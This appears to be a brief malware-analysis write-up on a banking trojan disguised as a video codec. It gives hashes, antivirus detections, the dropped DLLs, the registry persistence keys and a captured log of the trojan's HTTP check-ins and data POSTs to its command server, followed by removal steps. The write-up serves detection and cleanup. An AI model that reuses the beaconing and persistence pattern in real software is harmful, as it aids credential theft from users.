Trojan-Dropper.Win32.Ambler
Recently a user has submitted a suspicious file, he informed us that he downloaded the files from a website that has served the file as a video codec. Below there is the report of the virus scaner:
Report Generated: 18.3.2009 at 16.34.15 (GMT 1)
File Name: setup_exe
File Size: 63 KB
MD5 Hash: A11E0E5389C93738D793E850C8AAA1C1
SHA1 Hash: FB87D25EB2AB42392009809A2369F42618D3DDD1
Detection Rate: 7 on 24 (29,16 %)
Status: INFECTED
Antivirus Sig version Engine Version Result
a-squared 18/03/2009 4.0.0.32 Trojan-Dropper.Win32.Ambler!IK
Avira AntiVir 7.1.2.187 8.1.2.12 TR/Banker.Banker.aflq
Avast 090317-0 4.8.1229 -
AVG 270.11.18/2009 8.0.0.0 -
BitDefender 18/03/2009 7.0.0.2555 -
ClamAV 18/03/2009 0.93.1.0 -
Comodo 1066 3.8 -
Dr.Web 18/03/2009 5.0 -
Ewido 18/03/2009 4.0.0.2 -
F-PROT 6 20090317 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 18/03/2009 1001044 Trojan-Dropper.Win32.Ambler
Kaspersky 18/03/2009 8.0.0.357 -
McAfee 18/03/2009 5.1.0.0 PWS-Banker trojan
Malware Hash Registry 18/03/2009 N/A -
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler
Norman 2009/03/17 5.92.08 Trojan W32/Malware.FZKP
Panda 07/02/2009 9.5.1.00 -
QuickHeal 18 March, 2009 10.0 -
Solo Antivirus 18/03/2009 8.0 -
Sophos 18/03/2009 4.32.0 Troj/Spy-BV
TrendMicro 901(590100) 1.1-1001 -
VBA32 18/03/2009 3.12.0.300 -
VirusBuster 10.102.13 1.4.3 -
After the execution of the malicious file have been copied two files in the system32 folder:
1 2 | C:\WINDOWS\system32\wh C:\WINDOWS\system32\kmsvc32.dll |
The file kmsvc32.dll is classified as a spy tool:
a-squared 18/03/2009 4.0.0.32 Trojan-PWS.Win32.Agent!IK
AVG 270.11.18/2009 8.0.0.0 PSW.Generic7.TP
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler.M
Norman 2009/03/17 5.92.08 Backdoor W32/Smalldoor.DSTB
The malware modified the registry by adding these keys:
1 2 3 4 5 | HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\InprocServer32\kmsvc32.dll
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\
InprocServer32\kmsvc32.dll |
Now, immediately after I have opened Internet Explorer, the malware started to send and receive data with this IP:
1 | 85.17.209.45 (e-point.com.ua) |
Internet traffic:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | GET /admin/cd.php?userid=-- HTTP/1.1 User-Agent: AS Host: e-point.com.ua Cache-Control: no-cache HTTP/1.1 200 OK POST /admin/dan.php HTTP/1.1 Referer: SAS Content-Type: application/x-www-form-urlencoded User-Agent: AE Host: e-point.com.ua Content-Length: 30 Cache-Control: no-cache GET /admin/cd.php?userid=1190928_11344_24235789 HTTP/1.1 User-Agent: AS Host: e-point.com.ua Cache-Control: no-cache |
Note that the User Agent is always set to AS or AE. After, we found new files in the folder of Temporary Internet Files:
New files have been copied also in system32 folder:
1 2 3 4 5 6 7 | C:\WINDOWS\system32\fiod.dll C:\WINDOWS\system32\bb1.dat C:\WINDOWS\system32\cmds.txt C:\WINDOWS\system32\cs.dat C:\WINDOWS\system32\fiod.dll C:\WINDOWS\system32\ps1.dat C:\WINDOWS\system32\rc.dat |
How to remove Trojan-Dropper.Win32.Ambler ?
1) Unregister the dll named kmsvc32.dll
2) Delete all created files
3) Delete all created registry keys
4) Restart the PC
Scan you system with NoVirusThanks Malware Remover.
